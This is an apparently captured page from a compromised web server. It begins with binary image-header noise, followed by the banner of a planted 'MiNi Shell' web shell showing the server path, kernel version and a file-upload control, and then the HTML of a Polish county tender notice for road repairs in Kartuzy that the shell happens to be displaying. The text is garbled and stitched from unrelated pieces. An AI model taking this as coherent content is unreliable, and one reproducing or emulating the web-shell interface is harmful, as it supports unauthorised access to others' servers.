JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230920/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230920/0040496701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie naprawy dróg powiatowych w obszarze działania Zarządu Dróg Powiatowych w Kartuzach. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Kartuski - Zarząd Dróg Powiatowych w Kartuzach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191687253</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Gdańska 26</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kartuzy</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">83-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">586810715</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@zdpk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">zdp.kartuzy.ibip.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Zarządzanie drogami powiatowymi na terenie Powiatu Kartuskiego </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie naprawy dróg powiatowych w obszarze działania Zarządu Dróg Powiatowych w Kartuzach. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a46b43a0-56bb-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00404967</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00000919/24/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.15 Wykonanie naprawy dróg powiatowych w obszarze działania Zarządu Dróg Powiatowych w Kartuzach.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zdp_kartuzy <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/zdp_kartuzy</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Funkcjonalność platformy gwarantuje<br/>złożenie przez Wykonawcę w postępowaniu zaszyfrowanej oferty wraz z załącznikami, w sposób uniemożliwiający Zamawiającemu<br/>zapoznanie się z treścią oferty przed upływem terminu składania ofert. Za datę przekazania oferty na platformie przyjmuje się datę<br/>jej przekazania w systemie poprzez kliknięcie przycisku „Złóż ofertę” w kroku drugim składania oferty i wyświetleniu komunikatu, że<br/>oferta została złożona. W toku postępowania wszelka komunikacja, w tym oświadczenia, wnioski, zawiadomienia oraz inne<br/>informacje przekazywane będą za pomocą udostępnionego na platformie formularza „Wyślij wiadomość do zamawiającego”. Za datę<br/>przekazania oświadczeń, wniosków oraz innych informacji przyjmuje się datę ich przesłania za pośrednictwem platformy poprzez<br/>kliknięcie przycisku „Wyślij wiadomość do zamawiającego”, po którym pojawi się komunikat, że wiadomość została wysłana do<br/>zamawiającego. Informacje dotyczące odpowiedzi na pytania, zmiany SWZ, zmiany terminu składania i otwarcia ofert Zamawiający<br/>będzie zamieszczał na platformie w sekcji „Komunikaty”. Zalecenia odnośnie kwalifikowanego podpisu elektronicznego: dla<br/>dokumentów w formacie „pdf” zaleca się podpis w formatem PAdES, dokumenty w formacie innym niż „pdf” zaleca się podpisywać<br/>formatem XAdES. Zalecenia odnośnie podpisu osobistego: dla dokumentów w formacie „pdf” lub „xml” zaleca się podpis wewnętrzny<br/>(otoczony), dokumenty w formacie innym niż „pdf” zaleca się podpisywać podpisem zewnętrznym lub otaczającym. Zalecenia<br/>odnośnie podpisu zaufanego: wielkość dokumentów nie może przekraczać 10 MB, dostępny format podpisu „xml”. Zamawiający<br/>określa niezbędne wymagania sprzętowo – aplikacyjne umożliwiające pracę na platformie: stały dostęp do sieci Internet o<br/>gwarantowanej przepustowości nie mniejszej niż 512 kb/s, komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2G<br/>RAM, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych – MS Windows 7, Mac OS x 10.4, Linux lub<br/>ich nowsze wersje, zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0.,<br/>włączona obsługa JavaScript, zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf, oznaczenie<br/>czasu odbioru danych przez platformę stanowi datę oraz dokładny czas (hh:mm:ss), na platformie występuje limit objętości plików<br/>lub spakowanych folderów w zakresie całej oferty do ilości 10 plików lub spakowanych folderów przy maksymalnej wielkości 150MB.<br/>Zamawiający dopuszcza przysyłanie danych w formatach dopuszczonych odpowiednimi przepisami prawa tj.: mi.in.: .doc; .docx;<br/>.odt; .xls; .xlsx; .pdf przy czym Zamawiający zaleca wykorzystywanie plików w formacie .pdf . Zamawiający dopuszcza kompresję<br/>danych: .zip, .7Z. Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego akceptuje warunki korzystania z<br/>platformy, określone w regulaminie zamieszczonym na stronie internetowej: https://platformazakupowa.pl/pn/zdp_kartuzy oraz<br/>uznaje go za wiążący. Zamawiający informuje, że instrukcje korzystania z platformy znajdują się pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje oraz w zakładce prowadzonego postępowania. Zamawiający nie ponosi<br/>odpowiedzialności za złożenie oferty w sposób niezgodny z instrukcją korzystania z platformy, w szczególności za sytuację, gdy<br/>zapozna się z treścią oferty przed upływem terminu składania ofert. Taka oferta nie będzie brana pod uwagę w przedmiotowym<br/>postępowaniu. W przypadku przekazywania dokumentu elektronicznego w formacie poddającym dane kompresji, opatrzenie pliku<br/>zawierającego skompresowane dokumenty kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym<br/>jest równoznaczne z opatrzeniem wszystkich dokumentów zawartych w tym pliku podpisem kwalifikowanym, podpisem zaufanym<br/>lub podpisem osobistym. Wykonawca może również komunikować się za pomocą email: przetargi@zdpk.pl (za wyjątkiem oferty z<br/>załącznikami).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem, czyli podmiotem decydującym o tym, które dane osobowe będą<br/>przetwarzane oraz w jakim celu, i jakimi sposobami, jest Zarząd Dróg Powiatowych w Kartuzach z siedzibą przy ul. Gdańskiej 26 w<br/>Kartuzach email: sekretariat@zdpk.pl<br/>Inspektor ochrony danych<br/>We wszystkich sprawach dotyczących ochrony danych osobowych, macie Państwo prawo kontaktować się z naszym Inspektorem<br/>ochrony danych na adres mailowy: iod@zdpk.pl<br/>Cel przetwarzania<br/>Państwa dane są przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego, zawarcia i wykonania umowy w niniejszym postępowaniu.<br/>Podstawa przetwarzania danych<br/>Podstawa prawną przetwarzania danych są przepisy prawa: ustawa z dnia 11 września 2019 roku Prawo zamówień publicznych,<br/>ustawa o narodowym zasobie archiwalnym i archiwach (zgodnie z art. 6 ust. 1 lit. c) RODO). W przypadku dobrowolnego podania<br/>danych niewynikających z przepisów prawa podstawą przetwarzania Państwa danych osobowych jest Państwa zgoda wyrażona<br/>poprzez akt uczestnictwa w postępowaniu (zgodnie z art. 6 ust. 1 lit. a) RODO). Pełną treść obowiązku informacyjnego znajdziecie<br/>Państwo w pkt 25 SWZ niniejszego postępowania oraz na naszej stronie www<br/>http://zdp.kartuzy.ibip.pl w zakładce OCHRONA DANYCH OSOBOWYCH/ Klauzula informacyjna</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Ograniczenie dostępu do Państwa danych o których mowa wyżej może wystąpić jedynie<br/>w szczególnych przypadkach jeśli jest to uzasadnione ochroną prywatności zgodnie z art. 18 ust. 5 pkt) 1 i 2 ustawy z dnia 11<br/>września 2019 r. Prawo zamówień publicznych. Pełną treść obowiązku informacyjnego znajdziecie Państwo w pkt 25 SWZ<br/>niniejszego postępowania oraz na naszej stronie www http://zdp.kartuzy.ibip.pl w zakładce OCHRONA DANYCH OSOBOWYCH/<br/>Klauzula informacyjna</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDP4.26.02.6.2023.PD</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PRZEDMIAR ROBÓT<br/> WYKONANIE NAPRAWY PRZEŁOMÓW NAWIERZCHNI BITUMICZNYCH ORAZ WYKONANIE REMONTÓW NAWIERZCHNI BITUMICZNYCH NA DROGACH POWIATOWYCH POWIATU KARTUSKIEGO<br/>Wyszczególnienie elementów	Jednostka <br/>rozliczeniowych	nazwa	ilość<br/>2	3	4<br/>Naprawa przełomów nawierzchni bitumicznych – część nr 1 <br/>Rozbiórka nawierzchni bitumicznej poprzez frezowanie o grubości do 10 cm wraz z wywozem w miejsce wskazane przez Zamawiającego - maksymalnie na odległość 30km.	m2	1000<br/>Rozbiórka mechaniczna podbudowy z kruszywa łamanego bądź betonu o grubości do 24 cm m2	1000<br/>Roboty ziemne wykonywane koparkami na głębość 30 cm	m2	1000<br/>Wykonanie warstwy gruntu stabilizowanego cementem C3/4 o grubości 20cm	m2	1000<br/>Wykonanie warstwy podbudowy z kruszywa łamanego stabilizownego mechanicznie 0/31,5 o grubości 25 cm	m2	1000<br/>Wykonanie warstwy podbudowy z betonu asfaltowego AC22P 50/70 o grubości 8 cm	m2	1000<br/>Wykonanie warstwy wiążącej z betonu asfaltowego AC16W 50/70 o grubości 4 cm	m2	1000<br/>Wykonanie warstwy ścieralnej z betonu asfaltowego AC11S 50/70 o grubości 4 cm	m2	1000<br/>Skropienie warstw konstrukcyjnych emulsją asfaltową	m2	2000<br/><br/>WARUNKI WYKONANIA I UWAGI KOŃCOWE<br/>1.	W przypadku napotkania w trakcie wykonywania robót uzbrojenia nie wykazane w in-wentaryzacji, należy napotkane uzbrojenie traktować jako czynne, zabezpieczyć je i po-wiadomić odpowiedniego właściciela lub użytkownika.<br/>2. Wykonawca po zakończeniu prac musi uporządkować teren robót.<br/>3.	Zaleca się, aby wykonawca zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy. Każdy z wykonawców ponosi pełną odpowiedzialność za skutki braku lub mylnego rozpoznania warunków realizacji zamówienia.<br/>4.	Do obowiązków Wykonawcy należy opracowanie i wprowadzenie czasowej organizacji ruchu na czas realizacji robót drogowych będących przedmiotem zamówienia – projekt należy zaopiniować w Zarządzie Dróg Powiatowych w Kartuzach i Komendzie Powiatowej Policji w Kartuzach a następnie uzyskać zatwierdzenie z Wydziału Komunikacji Starostwa Powiatowego w Kartuzach<br/>5.	Wykonawca jest odpowiedzialny za całokształt, w tym za przebieg oraz terminowe wykonanie przedmiotu zamówienia. Wymagana jest należyta staranność przy realizacji zobowiązań umowy.<br/>6.	Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy.<br/>7.	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.<br/>8.	Materiały i urządzenia niezbędne do realizacji prac zapewnia Wykonawca.<br/><br/>4. Informacje dodatkowe:<br/>1)	Wykonawca powinien dysponować telefonem stacjonarnym/ telefonem komórkowym do bezpośredniej łączności z Wykonawcą (osobą odpowiedzialną za podjęcie czynności – wskazaną do kontaktów w umowie).<br/>2)	Okres rękojmi za wady i gwarancji jakości na przedmiot zamówienia wynosi: min. 12 mie-sięcy.<br/>3)	Roboty będą prowadzone na sieci dróg powiatowych będących w zarządzie Zarządu Dróg Powiatowych w Kartuzach wraz z zabezpieczeniem miejsca prowadzenia robót i właści-wym jego oznakowaniem. Prace ww. mają być wykonywane z zachowaniem zasad bezpie-czeństwa i zgodnie z obowiązującymi przepisami. <br/>4)	Zaleca się, aby Wykonawca zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy. Każdy z wykonawców ponosi pełną odpo-wiedzialność za skutki braku lub mylnego rozpoznania warunków realizacji zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">80 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp do wysokości 100 % wartości zamówienia podstawowego (dotyczy obu części zamówienia) w zakresie wykonania podobnych robót budowlanych, co w postępowaniu. Zakres zamówienia podobnego obejmuje wykonanie odpowiednio dla części nr 1 wykonanie naprawy przełomów nawierzchni bitumicznych oraz dal części nr 2 wykonanie remontów nawierzchni bitumicznych na drogach powiatowych zgodnie z przedmiotem zamówienia.<br/><br/>Warunki udzielenia zamówienia podobnego, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp:<br/><br/>1)	Wykonawca wykonał lub wykonuje należycie zamówienie podstawowe,<br/>2)	Wykonawca zapewni wykonanie zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp w standardzie nie gorszym niż przyjęty do wykonania zamówienia podstawowego.<br/>3)	W ramach prowadzonych negocjacji, Zamawiający i Wykonawca dojdą do porozumienia odnośnie ceny i terminu wykonania.<br/>4)	Istotne postanowienia umowy o udzielenie zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, inne niż określone w pkt. 3 powyżej, będą zgodne z istotnymi postanowieniami umowy zawartymi w umowie dla zamówienia podstawowego.<br/>5)	Szacunkowe przedmiary robót dla zamówień podobnych:<br/><br/><br/><br/><br/><br/><br/><br/><br/>PRZEDMIAR ROBÓT<br/> WYKONANIE NAPRAWY PRZEŁOMÓW NAWIERZCHNI BITUMICZNYCH ORAZ WYKONANIE REMONTÓW NAWIERZCHNI BITUMICZNYCH NA DROGACH POWIATOWYCH POWIATU KAR-TUSKIEGO<br/>Lp.	Wyszczególnienie elementów	Jednostka <br/> rozliczeniowych	nazwa	ilość<br/>1	2	3	4<br/> Naprawa przełomów nawierzchni bitumicznych – część nr 1 <br/>1	Rozbiórka nawierzchni bitumicznej poprzez frezowanie o grubości do 10 cm wraz z wywozem w miejsce wskazane przez Zamawiającego - maksymalnie na odległość 30km.	m2	1000<br/>2	Rozbiórka mechaniczna podbudowy z kruszywa łamanego bądź betonu o grubości do 24 cm m2	1000<br/>3	Roboty ziemne wykonywane koparkami na głębość 30 cm	m2	1000<br/>4	Wykonanie warstwy gruntu stabilizowanego cementem C3/4 o grubości 20cm	m2	1000<br/>5	Wykonanie warstwy podbudowy z kruszywa łamanego stabilizownego me-chanicznie 0/31,5 o grubości 25 cm	m2	1000<br/>6	Wykonanie warstwy podbudowy z betonu asfaltowego AC22P 50/70 o grubo-ści 8 cm	m2	1000<br/>7	Wykonanie warstwy wiążącej z betonu asfaltowego AC16W 50/70 o grubości 4 cm	m2	1000<br/>8	Wykonanie warstwy ścieralnej z betonu asfaltowego AC11S 50/70 o grubości 4 cm	m2	1000<br/>9	Skropienie warstw konstrukcyjnych emulsją asfaltową	m2	2000<br/> Remonty cząstkowe nawierzchni bitumicznych – część 2</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający za najkorzystniejszą uzna ofertę niepodlegającą odrzuceniu, która uzyska największą liczbę punktów obliczona w oparciu o podane kryteria oceny ofert przedmiotu zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W ramach remontów cząstkowych przewiduje się wykonanie następujących prac: <br/>- frezowanie istniejącej nawierzchni bitumicznej <br/>- oczyszczenie sfrezowanej nawierzchni<br/>- skropienie sfrezowanej nawierzchni <br/>- wykonanie warstwy ścieralnej z mieszanki AC11S<br/><br/><br/>	WARUNKI WYKONANIA I UWAGI KOŃCOWE<br/>1.	W przypadku napotkania w trakcie wykonywania robót uzbrojenia nie wykazane w in-wentaryzacji, należy napotkane uzbrojenie traktować jako czynne, zabezpieczyć je i po-wiadomić odpowiedniego właściciela lub użytkownika.<br/>2. Wykonawca po zakończeniu prac musi uporządkować teren robót.<br/>3.	Zaleca się, aby wykonawca zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy. Każdy z wykonawców ponosi pełną odpowiedzialność za skutki braku lub mylnego rozpoznania warunków realizacji zamówienia.<br/>4.	Do obowiązków Wykonawcy należy opracowanie i wprowadzenie czasowej organizacji ruchu na czas realizacji robót drogowych będących przedmiotem zamówienia – projekt należy zaopiniować w Zarządzie Dróg Powiatowych w Kartuzach i Komendzie Powiatowej Policji w Kartuzach a następnie uzyskać zatwierdzenie z Wydziału Komunikacji Starostwa Powiatowego w Kartuzach<br/>5.	Wykonawca jest odpowiedzialny za całokształt, w tym za przebieg oraz terminowe wykonanie przedmiotu zamówienia. Wymagana jest należyta staranność przy realizacji zobowiązań umowy.<br/>6.	Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy.<br/>7.	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.<br/>8.	Materiały i urządzenia niezbędne do realizacji prac zapewnia Wykonawca.<br/><br/>4. Informacje dodatkowe:<br/>1)	Wykonawca powinien dysponować telefonem stacjonarnym/ telefonem komórkowym do bezpośredniej łączności z Wykonawcą (osobą odpowiedzialną za podjęcie czynności – wskazaną do kontaktów w umowie).<br/>2)	Okres rękojmi za wady i gwarancji jakości na przedmiot zamówienia wynosi: min. 12 mie-sięcy.<br/>3)	Roboty będą prowadzone na sieci 